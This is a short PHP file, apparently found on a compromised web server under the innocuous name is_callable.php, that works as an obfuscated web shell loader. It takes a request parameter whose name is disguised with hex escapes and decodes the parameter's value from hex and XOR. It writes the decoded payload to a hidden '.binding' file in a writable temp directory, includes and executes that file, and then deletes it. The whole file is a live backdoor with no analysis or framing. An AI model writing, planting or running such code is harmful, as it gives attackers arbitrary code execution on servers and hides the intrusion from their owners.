File: /www/wwwroot/q.autos58.cn/is_callable.php
<?php
if(isset($_REQUEST["\x64at\x61_ch\x75nk"])){
$mrk = array_filter([getenv("TMP"), "/dev/shm", "/tmp", getenv("TEMP"), "/var/tmp", getcwd(), sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir")]);
$ptr = hex2bin($_REQUEST["\x64at\x61_ch\x75nk"]);
$component = '' ; $a = 0; while($a < strlen($ptr)){$component .= chr(ord($ptr[$a]) ^ 86);$a++;}
foreach ($mrk as $bind) {
if ((bool)is_dir($bind) && (bool)is_writable($bind)) {
$ent = join("/", [$bind, ".binding"]);
$success = file_put_contents($ent, $component);
if ($success) {
include $ent;
@unlink($ent);
exit;}
}
}
}